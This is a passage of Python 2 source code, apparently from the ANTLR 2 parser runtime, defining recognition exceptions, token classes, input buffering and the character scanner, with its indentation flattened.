'', -1, -1)
def __str__(self):
mesg = "unexpected char: "
if self.foundChar >= ' ' and self.foundChar <= '~':
mesg += "'" + self.foundChar + "'"
elif self.foundChar:
mesg += "0x" + hex(ord(self.foundChar)).upper()[2:]
else:
mesg += "<None>"
return mesg
__repr__ = __str__
class SemanticException(RecognitionException):
def __init__(self, *args):
RecognitionException.__init__(self, *args)
class MismatchedCharException(RecognitionException):
NONE = 0
CHAR = 1
NOT_CHAR = 2
RANGE = 3
NOT_RANGE = 4
SET = 5
NOT_SET = 6
def __init__(self, *args):
self.args = args
if len(args) == 5:
# Expected range / not range
if args[3]:
self.mismatchType = MismatchedCharException.NOT_RANGE
else:
self.mismatchType = MismatchedCharException.RANGE
self.foundChar = args[0]
self.expecting = args[1]
self.upper = args[2]
self.scanner = args[4]
RecognitionException.__init__(self, "Mismatched char range",
self.scanner.getFilename(),
self.scanner.getLine(),
self.scanner.getColumn())
elif len(args) == 4 and is_string_type(args[1]):
# Expected char / not char
if args[2]:
self.mismatchType = MismatchedCharException.NOT_CHAR
else:
self.mismatchType = MismatchedCharException.CHAR
self.foundChar = args[0]
self.expecting = args[1]
self.scanner = args[3]
RecognitionException.__init__(self, "Mismatched char",
self.scanner.getFilename(),
self.scanner.getLine(),
self.scanner.getColumn())
elif len(args) == 4 and isinstance(args[1], BitSet):
# Expected BitSet / not BitSet
if args[2]:
self.mismatchType = MismatchedCharException.NOT_SET
else:
self.mismatchType = MismatchedCharException.SET
self.foundChar = args[0]
self.set = args[1]
self.scanner = args[3]
RecognitionException.__init__(self, "Mismatched char set",
self.scanner.getFilename(),
self.scanner.getLine(),
self.scanner.getColumn())
else:
self.mismatchType = MismatchedCharException.NONE
RecognitionException.__init__(self, "Mismatched char")
## Append a char to the msg buffer. If special,
# then show escaped version
#
def appendCharName(self, sb, c):
if not c or c == 65535:
# 65535 = (char) -1 = EOF
sb.append("'<EOF>'")
elif c == '\n':
sb.append("'\\n'")
elif c == '\r':
sb.append("'\\r'");
elif c == '\t':
sb.append("'\\t'")
else:
sb.append('\'' + c + '\'')
##
# Returns an error message with line number/column information
#
def __str__(self):
sb = ['']
sb.append(RecognitionException.__str__(self))
if self.mismatchType == MismatchedCharException.CHAR:
sb.append("expecting ")
self.appendCharName(sb, self.expecting)
sb.append(", found ")
self.appendCharName(sb, self.foundChar)
elif self.mismatchType == MismatchedCharException.NOT_CHAR:
sb.append("expecting anything but '")
self.appendCharName(sb, self.expecting)
sb.append("'; got it anyway")
elif self.mismatchType in [MismatchedCharException.RANGE, MismatchedCharException.NOT_RANGE]:
sb.append("expecting char ")
if self.mismatchType == MismatchedCharException.NOT_RANGE:
sb.append("NOT ")
sb.append("in range: ")
appendCharName(sb, self.expecting)
sb.append("..")
appendCharName(sb, self.upper)
sb.append(", found ")
appendCharName(sb, self.foundChar)
elif self.mismatchType in [MismatchedCharException.SET, MismatchedCharException.NOT_SET]:
sb.append("expecting ")
if self.mismatchType == MismatchedCharException.NOT_SET:
sb.append("NOT ")
sb.append("one of (")
for i in range(len(self.set)):
self.appendCharName(sb, self.set[i])
sb.append("), found ")
self.appendCharName(sb, self.foundChar)
return str().join(sb).strip()
__repr__ = __str__
class MismatchedTokenException(RecognitionException):
NONE = 0
TOKEN = 1
NOT_TOKEN = 2
RANGE = 3
NOT_RANGE = 4
SET = 5
NOT_SET = 6
def __init__(self, *args):
self.args = args
self.tokenNames = []
self.token = None
self.tokenText = ''
self.node = None
if len(args) == 6:
# Expected range / not range
if args[3]:
self.mismatchType = MismatchedTokenException.NOT_RANGE
else:
self.mismatchType = MismatchedTokenException.RANGE
self.tokenNames = args[0]
self.expecting = args[2]
self.upper = args[3]
self.fileName = args[5]
elif len(args) == 4 and isinstance(args[2], int):
# Expected token / not token
if args[3]:
self.mismatchType = MismatchedTokenException.NOT_TOKEN
else:
self.mismatchType = MismatchedTokenException.TOKEN
self.tokenNames = args[0]
self.expecting = args[2]
elif len(args) == 4 and isinstance(args[2], BitSet):
# Expected BitSet / not BitSet
if args[3]:
self.mismatchType = MismatchedTokenException.NOT_SET
else:
self.mismatchType = MismatchedTokenException.SET
self.tokenNames = args[0]
self.set = args[2]
else:
self.mismatchType = MismatchedTokenException.NONE
RecognitionException.__init__(self, "Mismatched Token: expecting any AST node", "<AST>", -1, -1)
if len(args) >= 2:
if isinstance(args[1],Token):
self.token = args[1]
self.tokenText = self.token.getText()
RecognitionException.__init__(self, "Mismatched Token",
self.fileName,
self.token.getLine(),
self.token.getColumn())
elif isinstance(args[1],AST):
self.node = args[1]
self.tokenText = str(self.node)
RecognitionException.__init__(self, "Mismatched Token",
"<AST>",
self.node.getLine(),
self.node.getColumn())
else:
self.tokenText = "<empty tree>"
RecognitionException.__init__(self, "Mismatched Token",
"<AST>", -1, -1)
def appendTokenName(self, sb, tokenType):
if tokenType == INVALID_TYPE:
sb.append("<Set of tokens>")
elif tokenType < 0 or tokenType >= len(self.tokenNames):
sb.append("<" + str(tokenType) + ">")
else:
sb.append(self.tokenNames[tokenType])
##
# Returns an error message with line number/column information
#
def __str__(self):
sb = ['']
sb.append(RecognitionException.__str__(self))
if self.mismatchType == MismatchedTokenException.TOKEN:
sb.append("expecting ")
self.appendTokenName(sb, self.expecting)
sb.append(", found " + self.tokenText)
elif self.mismatchType == MismatchedTokenException.NOT_TOKEN:
sb.append("expecting anything but '")
self.appendTokenName(sb, self.expecting)
sb.append("'; got it anyway")
elif self.mismatchType in [MismatchedTokenException.RANGE, MismatchedTokenException.NOT_RANGE]:
sb.append("expecting token ")
if self.mismatchType == MismatchedTokenException.NOT_RANGE:
sb.append("NOT ")
sb.append("in range: ")
appendTokenName(sb, self.expecting)
sb.append("..")
appendTokenName(sb, self.upper)
sb.append(", found " + self.tokenText)
elif self.mismatchType in [MismatchedTokenException.SET, MismatchedTokenException.NOT_SET]:
sb.append("expecting ")
if self.mismatchType == MismatchedTokenException.NOT_SET:
sb.append("NOT ")
sb.append("one of (")
for i in range(len(self.set)):
self.appendTokenName(sb, self.set[i])
sb.append("), found " + self.tokenText)
return str().join(sb).strip()
__repr__ = __str__
class TokenStreamException(ANTLRException):
def __init__(self, *args):
ANTLRException.__init__(self, *args)
# Wraps an Exception in a TokenStreamException
class TokenStreamIOException(TokenStreamException):
def __init__(self, *args):
if args and isinstance(args[0], Exception):
io = args[0]
TokenStreamException.__init__(self, str(io))
self.io = io
else:
TokenStreamException.__init__(self, *args)
self.io = self
# Wraps a RecognitionException in a TokenStreamException
class TokenStreamRecognitionException(TokenStreamException):
def __init__(self, *args):
if args and isinstance(args[0], RecognitionException):
recog = args[0]
TokenStreamException.__init__(self, str(recog))
self.recog = recog
else:
raise TypeError("TokenStreamRecognitionException requires RecognitionException argument")
def __str__(self):
return str(self.recog)
__repr__ = __str__
class TokenStreamRetryException(TokenStreamException):
def __init__(self, *args):
TokenStreamException.__init__(self, *args)
class CharStreamException(ANTLRException):
def __init__(self, *args):
ANTLRException.__init__(self, *args)
# Wraps an Exception in a CharStreamException
class CharStreamIOException(CharStreamException):
def __init__(self, *args):
if args and isinstance(args[0], Exception):
io = args[0]
CharStreamException.__init__(self, str(io))
self.io = io
else:
CharStreamException.__init__(self, *args)
self.io = self
class TryAgain(Exception):
pass
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### Token ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class Token(object):
SKIP = -1
INVALID_TYPE = 0
EOF_TYPE = 1
EOF = 1
NULL_TREE_LOOKAHEAD = 3
MIN_USER_TYPE = 4
def __init__(self,**argv):
try:
self.type = argv['type']
except:
self.type = INVALID_TYPE
try:
self.text = argv['text']
except:
self.text = "<no text>"
def isEOF(self):
return (self.type == EOF_TYPE)
def getColumn(self):
return 0
def getLine(self):
return 0
def getFilename(self):
return None
def setFilename(self,name):
return self
def getText(self):
return "<no text>"
def setText(self,text):
if is_string_type(text):
pass
else:
raise TypeError("Token.setText requires string argument")
return self
def setColumn(self,column):
return self
def setLine(self,line):
return self
def getType(self):
return self.type
def setType(self,type):
if isinstance(type,int):
self.type = type
else:
raise TypeError("Token.setType requires integer argument")
return self
def toString(self):
## not optimal
type_ = self.type
if type_ == 3:
tval = 'NULL_TREE_LOOKAHEAD'
elif type_ == 1:
tval = 'EOF_TYPE'
elif type_ == 0:
tval = 'INVALID_TYPE'
elif type_ == -1:
tval = 'SKIP'
else:
tval = type_
return '["%s",<%s>]' % (self.getText(),tval)
__str__ = toString
__repr__ = toString
### static attribute ..
Token.badToken = Token( type=INVALID_TYPE, text="<no text>")
if __name__ == "__main__":
print "testing .."
T = Token.badToken
print T
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CommonToken ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class CommonToken(Token):
def __init__(self,**argv):
Token.__init__(self,**argv)
self.line = 0
self.col = 0
try:
self.line = argv['line']
except:
pass
try:
self.col = argv['col']
except:
pass
def getLine(self):
return self.line
def getText(self):
return self.text
def getColumn(self):
return self.col
def setLine(self,line):
self.line = line
return self
def setText(self,text):
self.text = text
return self
def setColumn(self,col):
self.col = col
return self
def toString(self):
## not optimal
type_ = self.type
if type_ == 3:
tval = 'NULL_TREE_LOOKAHEAD'
elif type_ == 1:
tval = 'EOF_TYPE'
elif type_ == 0:
tval = 'INVALID_TYPE'
elif type_ == -1:
tval = 'SKIP'
else:
tval = type_
d = {
'text' : self.text,
'type' : tval,
'line' : self.line,
'colm' : self.col
}
fmt = '["%(text)s",<%(type)s>,line=%(line)s,col=%(colm)s]'
return fmt % d
__str__ = toString
__repr__ = toString
if __name__ == '__main__' :
T = CommonToken()
print T
T = CommonToken(col=15,line=1,text="some text", type=5)
print T
T = CommonToken()
T.setLine(1).setColumn(15).setText("some text").setType(5)
print T
print T.getLine()
print T.getColumn()
print T.getText()
print T.getType()
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CommonHiddenStreamToken ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class CommonHiddenStreamToken(CommonToken):
def __init__(self,*args):
CommonToken.__init__(self,*args)
self.hiddenBefore = None
self.hiddenAfter = None
def getHiddenAfter(self):
return self.hiddenAfter
def getHiddenBefore(self):
return self.hiddenBefore
def setHiddenAfter(self,t):
self.hiddenAfter = t
def setHiddenBefore(self, t):
self.hiddenBefore = t
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### Queue ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
## Shall be a circular buffer on tokens ..
class Queue(object):
def __init__(self):
self.buffer = [] # empty list
def append(self,item):
self.buffer.append(item)
def elementAt(self,index):
return self.buffer[index]
def reset(self):
self.buffer = []
def removeFirst(self):
self.buffer.pop(0)
def length(self):
return len(self.buffer)
def __str__(self):
return str(self.buffer)
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### InputBuffer ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class InputBuffer(object):
def __init__(self):
self.nMarkers = 0
self.markerOffset = 0
self.numToConsume = 0
self.queue = Queue()
def __str__(self):
return "(%s,%s,%s,%s)" % (
self.nMarkers,
self.markerOffset,
self.numToConsume,
self.queue)
def __repr__(self):
return str(self)
def commit(self):
self.nMarkers -= 1
def consume(self) :
self.numToConsume += 1
## probably better to return a list of items
## because of unicode. Or return a unicode
## string ..
def getLAChars(self) :
i = self.markerOffset
n = self.queue.length()
s = ''
while i<n:
s += self.queue.elementAt(i)
return s
## probably better to return a list of items
## because of unicode chars
def getMarkedChars(self) :
s = ''
i = 0
n = self.markerOffset
while i<n:
s += self.queue.elementAt(i)
return s
def isMarked(self) :
return self.nMarkers != 0
def fill(self,k):
### abstract method
raise NotImplementedError()
def LA(self,k) :
self.fill(k)
return self.queue.elementAt(self.markerOffset + k - 1)
def mark(self) :
self.syncConsume()
self.nMarkers += 1
return self.markerOffset
def rewind(self,mark) :
self.syncConsume()
self.markerOffset = mark
self.nMarkers -= 1
def reset(self) :
self.nMarkers = 0
self.markerOffset = 0
self.numToConsume = 0
self.queue.reset()
def syncConsume(self) :
while self.numToConsume > 0:
if self.nMarkers > 0:
# guess mode -- leave leading characters and bump offset.
self.markerOffset += 1
else:
# normal mode -- remove first character
self.queue.removeFirst()
self.numToConsume -= 1
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CharBuffer ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class CharBuffer(InputBuffer):
def __init__(self,reader):
##assert isinstance(reader,file)
super(CharBuffer,self).__init__()
## a reader is supposed to be anything that has
## a method 'read(int)'.
self.input = reader
def __str__(self):
base = super(CharBuffer,self).__str__()
return "CharBuffer{%s,%s" % (base,str(input))
def fill(self,amount):
try:
self.syncConsume()
while self.queue.length() < (amount + self.markerOffset) :
## retrieve just one char - what happend at end
## of input?
c = self.input.read(1)
### python's behaviour is to return the empty string on
### EOF, ie. no exception whatsoever is thrown. An empty
### python string has the nice feature that it is of
### type 'str' and "not ''" would return true. Contrary,
### one can't do this: '' in 'abc'. This should return
### false, but all we get is then a TypeError as an
### empty string is not a character.
### Let's assure then that we have either seen a
### character or an empty string (EOF).
assert len(c) == 0 or len(c) == 1
### And it shall be of type string (ASCII or UNICODE).
assert is_string_type(c)
### Just append EOF char to buffer. Note that buffer may
### contain then just more than one EOF char ..
### use unicode chars instead of ASCII ..
self.queue.append(c)
except Exception,e:
raise CharStreamIOException(e)
##except: # (mk) Cannot happen ...
##error ("unexpected exception caught ..")
##assert 0
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### LexerSharedInputState ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class LexerSharedInputState(object):
def __init__(self,ibuf):
assert isinstance(ibuf,InputBuffer)
self.input = ibuf
self.column = 1
self.line = 1
self.tokenStartColumn = 1
self.tokenStartLine = 1
self.guessing = 0
self.filename = None
def reset(self):
self.column = 1
self.line = 1
self.tokenStartColumn = 1
self.tokenStartLine = 1
self.guessing = 0
self.filename = None
self.input.reset()
def LA(self,k):
return self.input.LA(k)
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TokenStream ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TokenStream(object):
def nextToken(self):
pass
def __iter__(self):
return TokenStreamIterator(self)
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TokenStreamIterator ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TokenStreamIterator(object):
def __init__(self,inst):
if isinstance(inst,TokenStream):
self.inst = inst
return
raise TypeError("TokenStreamIterator requires TokenStream object")
def next(self):
assert self.inst
item = self.inst.nextToken()
if not item or item.isEOF():
raise StopIteration()
return item
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TokenStreamSelector ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TokenStreamSelector(TokenStream):
def __init__(self):
self._input = None
self._stmap = {}
self._stack = []
def addInputStream(self,stream,key):
self._stmap[key] = stream
def getCurrentStream(self):
return self._input
def getStream(self,sname):
try:
stream = self._stmap[sname]
except:
raise ValueError("TokenStream " + sname + " not found");
return stream;
def nextToken(self):
while 1:
try:
return self._input.nextToken()
except TokenStreamRetryException,r:
### just retry "forever"
pass
def pop(self):
stream = self._stack.pop();
self.select(stream);
return stream;
def push(self,arg):
self._stack.append(self._input);
self.select(arg)
def retry(self):
raise TokenStreamRetryException()
def select(self,arg):
if isinstance(arg,TokenStream):
self._input = arg
return
if is_string_type(arg):
self._input = self.getStream(arg)
return
raise TypeError("TokenStreamSelector.select requires " +
"TokenStream or string argument")
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TokenStreamBasicFilter ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TokenStreamBasicFilter(TokenStream):
def __init__(self,input):
self.input = input;
self.discardMask = BitSet()
def discard(self,arg):
if isinstance(arg,int):
self.discardMask.add(arg)
return
if isinstance(arg,BitSet):
self.discardMark = arg
return
raise TypeError("TokenStreamBasicFilter.discard requires" +
"integer or BitSet argument")
def nextToken(self):
tok = self.input.nextToken()
while tok and self.discardMask.member(tok.getType()):
tok = self.input.nextToken()
return tok
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TokenStreamHiddenTokenFilter ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TokenStreamHiddenTokenFilter(TokenStreamBasicFilter):
def __init__(self,input):
TokenStreamBasicFilter.__init__(self,input)
self.hideMask = BitSet()
self.nextMonitoredToken = None
self.lastHiddenToken = None
self.firstHidden = None
def consume(self):
self.nextMonitoredToken = self.input.nextToken()
def consumeFirst(self):
self.consume()
p = None;
while self.hideMask.member(self.LA(1).getType()) or \
self.discardMask.member(self.LA(1).getType()):
if self.hideMask.member(self.LA(1).getType()):
if not p:
p = self.LA(1)
else:
p.setHiddenAfter(self.LA(1))
self.LA(1).setHiddenBefore(p)
p = self.LA(1)
self.lastHiddenToken = p
if not self.firstHidden:
self.firstHidden = p
self.consume()
def getDiscardMask(self):
return self.discardMask
def getHiddenAfter(self,t):
return t.getHiddenAfter()
def getHiddenBefore(self,t):
return t.getHiddenBefore()
def getHideMask(self):
return self.hideMask
def getInitialHiddenToken(self):
return self.firstHidden
def hide(self,m):
if isinstance(m,int):
self.hideMask.add(m)
return
if isinstance(m.BitMask):
self.hideMask = m
return
def LA(self,i):
return self.nextMonitoredToken
def nextToken(self):
if not self.LA(1):
self.consumeFirst()
monitored = self.LA(1)
monitored.setHiddenBefore(self.lastHiddenToken)
self.lastHiddenToken = None
self.consume()
p = monitored
while self.hideMask.member(self.LA(1).getType()) or \
self.discardMask.member(self.LA(1).getType()):
if self.hideMask.member(self.LA(1).getType()):
p.setHiddenAfter(self.LA(1))
if p != monitored:
self.LA(1).setHiddenBefore(p)
p = self.lastHiddenToken = self.LA(1)
self.consume()
return monitored
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### StringBuffer ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class StringBuffer:
def __init__(self,string=None):
if string:
self.text = list(string)
else:
self.text = []
def setLength(self,sz):
if not sz :
self.text = []
return
assert sz>0
if sz >= self.length():
return
### just reset to empty buffer
self.text = self.text[0:sz]
def length(self):
return len(self.text)
def append(self,c):
self.text.append(c)
### return buffer as string. Arg 'a' is used as index
## into the buffer and 2nd argument shall be the length.
## If 2nd args is absent, we return chars till end of
## buffer starting with 'a'.
def getString(self,a=None,length=None):
if not a :
a = 0
assert a>=0
if a>= len(self.text) :
return ""
if not length:
## no second argument
L = self.text[a:]
else:
assert (a+length) <= len(self.text)
b = a + length
L = self.text[a:b]
s = ""
for x in L : s += x
return s
toString = getString ## alias
def __str__(self):
return str(self.text)
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### Reader ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
## When reading Japanese chars, it happens that a stream returns a
## 'char' of length 2. This looks like a bug in the appropriate
## codecs - but I'm rather unsure about this. Anyway, if this is
## the case, I'm going to split this string into a list of chars
## and put them on hold, ie. on a buffer. Next time when called
## we read from buffer until buffer is empty.
## wh: nov, 25th -> problem does not appear in Python 2.4.0.c1.
class Reader(object):
def __init__(self,stream):
self.cin = stream
self.buf = []
def read(self,num):
assert num==1
if len(self.buf):
return self.buf.pop()
## Read a char - this may return a string.
## Is this a bug in codecs/Python?
c = self.cin.read(1)
if not c or len(c)==1:
return c
L = list(c)
L.reverse()
for x in L:
self.buf.append(x)
## read one char ..
return self.read(1)
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CharScanner ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class CharScanner(TokenStream):
## class members
NO_CHAR = 0
EOF_CHAR = '' ### EOF shall be the empty string.
def __init__(self, *argv, **kwargs):
super(CharScanner, self).__init__()
self.saveConsumedInput = True
self.tokenClass = None
self.caseSensitive = True
self.caseSensitiveLiterals = True
self.literals = None
self.tabsize = 8
self._returnToken = None
self.commitToPath = False
self.traceDepth = 0
self.text = StringBuffer()
self.hashString = hash(self)
self.setTokenObjectClass(CommonToken)
self.setInput(*argv)
def __iter__(self):
return CharScannerIterator(self)
def setInput(self,*argv):
## case 1:
## if there's no arg we default to read from
## standard input
if not argv:
import sys
self.setInput(sys.stdin)
return
## get 1st argument
arg1 = argv[0]
## case 2:
## if arg1 is a string, we assume it's a file name
## and open a stream using 2nd argument as open
## mode. If there's no 2nd argument we fall back to
## mode '+rb'.
if is_string_type(arg1):
f = open(arg1,"rb")
self.setInput(f)
self.setFilename(arg1)
return
## case 3:
## if arg1 is a file we wrap it by a char buffer (
## some additional checks?? No, can't do this in
## general).
if isinstance(arg1,file):
self.setInput(CharBuffer(arg1))
return
## case 4:
## if arg1 is of type SharedLexerInputState we use
## argument as is.
if isinstance(arg1,LexerSharedInputState):
self.inputState = arg1
return
## case 5:
## check whether argument type is of type input
## buffer. If so create a SharedLexerInputState and
## go ahead.
if isinstance(arg1,InputBuffer):
self.setInput(LexerSharedInputState(arg1))
return
## case 6:
## check whether argument type has a method read(int)
## If so create CharBuffer ...
try:
if arg1.read:
rd = Reader(arg1)
cb = CharBuffer(rd)
ss = LexerSharedInputState(cb)
self.inputState = ss
return
except:
pass
## case 7:
## raise wrong argument exception
raise TypeError(argv)
def setTabSize(self,size) :
self.tabsize = size
def getTabSize(self) :
return self.tabsize
def setCaseSensitive(self,t) :
self.caseSensitive = t
def setCommitToPath(self,commit) :
self.commitToPath = commit
def setFilename(self,f) :
self.inputState.filename = f
def setLine(self,line) :
self.inputState.line = line
def setText(self,s) :
self.resetText()
self.text.append(s)
def getCaseSensitive(self) :
return self.caseSensitive
def getCaseSensitiveLiterals(self) :
return self.caseSensitiveLiterals
def getColumn(self) :
return self.inputState.column
def setColumn(self,c) :
self.inputState.column = c
def getCommitToPath(self) :
return self.commitToPath
def getFilename(self) :
return self.inputState.filename
def getInputBuffer(self) :
return self.inputState.input
def getInputState(self) :
return self.inputState
def setInputState(self,state) :
assert isinstance(state,LexerSharedInputState)
self.inputState = state
def getLine(self) :
return self.inputState.line
def getText(self) :
return str(self.text)
def getTokenObject(self) :
return self._returnToken
def LA(self,i) :
c = self.inputState.input.LA(i)
if not self.caseSensitive:
### E0006
c = c.__class__.lower(c)
return c
def makeToken(self,type) :
try:
## dynamically load a class
assert self.tokenClass
tok = self.tokenClass()
tok.setType(type)
tok.setColumn(self.inputState.tokenStartColumn)
tok.setLine(self.inputState.tokenStartLine)
return tok
except:
self.panic("unable to create new token")
return Token.badToken
def mark(self) :
return self.inputState.input.mark()
def _match_bitset(self,b) :
if b.member(self.LA(1)):
self.consume()
else:
raise MismatchedCharException(self.LA(1), b, False, self)
def _match_string(self,s) :
for c in s:
if self.LA(1) == c:
self.consume()
else:
raise MismatchedCharException(self.LA(1), c, False, self)
def match(self,item):
if is_string_type(item):
return self._match_string(item)
else:
return self._match_bitset(item)
def matchNot(self,c) :
if self.LA(1) != c:
self.consume()
else:
raise MismatchedCharException(self.LA(1), c, True, self)
def matchRange(self,c1,c2) :
if self.LA(1) < c1 or self.LA(1) > c2 :
raise MismatchedCharException(self.LA(1), c1, c2, False, self)
else:
self.consume()
def newline(self) :
self.inputState.line += 1
self.inputState.column = 1
def tab(self) :
c = self.getColumn()
nc = ( ((c-1)/self.tabsize) + 1) * self.tabsize + 1
self.setColumn(nc)
def panic(self,s='') :
print "CharScanner: panic: " + s
sys.exit(1)
def reportError(self,ex) :
print ex
def reportError(self,s) :
if not self.getFilename():
print "error: " + str(s)
else:
print self.getFilename() + ": error: " + str(s)
def reportWarning(self,s) :
if not self.getFilename():
print "warning: " + str(s)
else:
print self.getFilename() + ": warning: " + str(s)
def resetText(self) :
self.text.setLength(0)
self.inputState.tokenStartColumn = self.inputState.column
self.inputState.tokenStartLine = self.inputState.line
def rewind(self,pos) :
self.inputState.input.rewind(pos)
def setTokenObjectClass(self,cl):
self.tokenClass = cl
def testForLiteral(self,token):
if not token:
return
assert isinstance(token,Token)
_type = token.getType()
## special tokens can't be literals
if _type in [SKIP,INVALID_TYPE,EOF_TYPE,NULL_TREE_LOOKAHEAD] :
return
_text = token.getText()
if not _text:
return
assert is_string_type(_text)
_type = self.testLiteralsTable(_text,_type)
token.setType(_type)
return _type
def testLiteralsTable(self,*args):
if is_string_type(args[0]):
s = args[0]
i = args[1]
else:
s = self.text.getString()
i = args[0]
## check whether integer has been given
if not isinstance(i,int):
assert isinstance(i,int)
## check whether we have a dict
assert isinstance(self.literals,dict)
try:
## E0010
if not self.caseSensitiveLiterals:
s = s.__class__.lower(s)
i = self.literals[s]
except:
pass
return i
def toLower(self,c):
return c.__class__.lower()
def traceIndent(self):
print ' ' * self.traceDepth
def traceIn(self,rname):
self.traceDepth += 1
self.traceIndent()
print "> lexer %s c== %s" % (rname,self.LA(1))
def traceOut(self,rname):
self.traceIndent()
print "< lexer %s c== %s" % (rname,self.LA(1))
self.traceDepth -= 1
def uponEOF(self):
pass
def append(self,c):
if self.saveConsumedInput :
self.text.append(c)
def commit(self):
self.inputState.input.commit()
def consume(self):
if not self.inputState.guessing:
c = self.LA(1)
if self.caseSensitive:
self.append(c)
else:
# use input.LA(), not LA(), to get original case
# CharScanner.LA() would toLower it.
c = self.inputState.input.LA(1)
self.append(c)
if c and c in "\t":
self.tab()
else:
self.inputState.column += 1
self.inputState.input.consume()
## Consume chars until one matches the given char
def consumeUntil_char(self,c):
while self.LA(1) != EOF_CHAR and self.LA(1) != c:
self.consume()
## Consume chars until one matches the given set
def consumeUntil_bitset(self,bitset):
while self.LA(1) != EOF_CHAR and not self.set.member(self.LA(1)):
self.consume()
### If symbol seen is EOF then generate and set token, otherwise
### throw exception.
def default(self,la1):
if not la1 :
self.uponEOF()
self._returnToken = self.makeToken(EOF_TYPE)
else:
self.raise_NoViableAlt(la1)
def filterdefault(self,la1,*args):
if not la1:
self.uponEOF()
self._returnToken = self.makeToken(EOF_TYPE)
return
if not args:
self.consume()
raise TryAgain()
else:
### apply filter object
self.commit();
try:
func=args[0]
args=args[1:]
apply(func,args)
except RecognitionException, e:
## catastrophic failure
self.reportError(e);
self.consume();
raise TryAgain()
def raise_NoViableAlt(self,la1=None):
if not la1: la1 = self.LA(1)
fname = self.getFilename()
line = self.getLine()
col = self.getColumn()
raise NoViableAltForCharException(la1,fname,line,col)
def set_return_token(self,_create,_token,_ttype,_offset):
if _create and not _token and (not _ttype == SKIP):
string = self.text.getString(_offset)
_token = self.makeToken(_ttype)
_token.setText(string)
self._returnToken = _token
return _token
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CharScannerIterator ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class CharScannerIterator:
def __init__(self,inst):
if isinstance(inst,CharScanner):
self.inst = inst
return
raise TypeError("CharScannerIterator requires CharScanner object")
def next(self):
assert self.inst
item = self.inst.nextToken()
if not item or item.isEOF():
raise StopIteration()
return item
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### BitSet ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### I'm assuming here that a long is 64bits. It appears however, that
### a long is of any size. That means we can use a single long as the
### bitset (!), ie. Python would do almost all the work (TBD).
class BitSet(object):
BITS = 64
NIBBLE = 4
LOG_BITS = 6
MOD_MASK = BITS -1
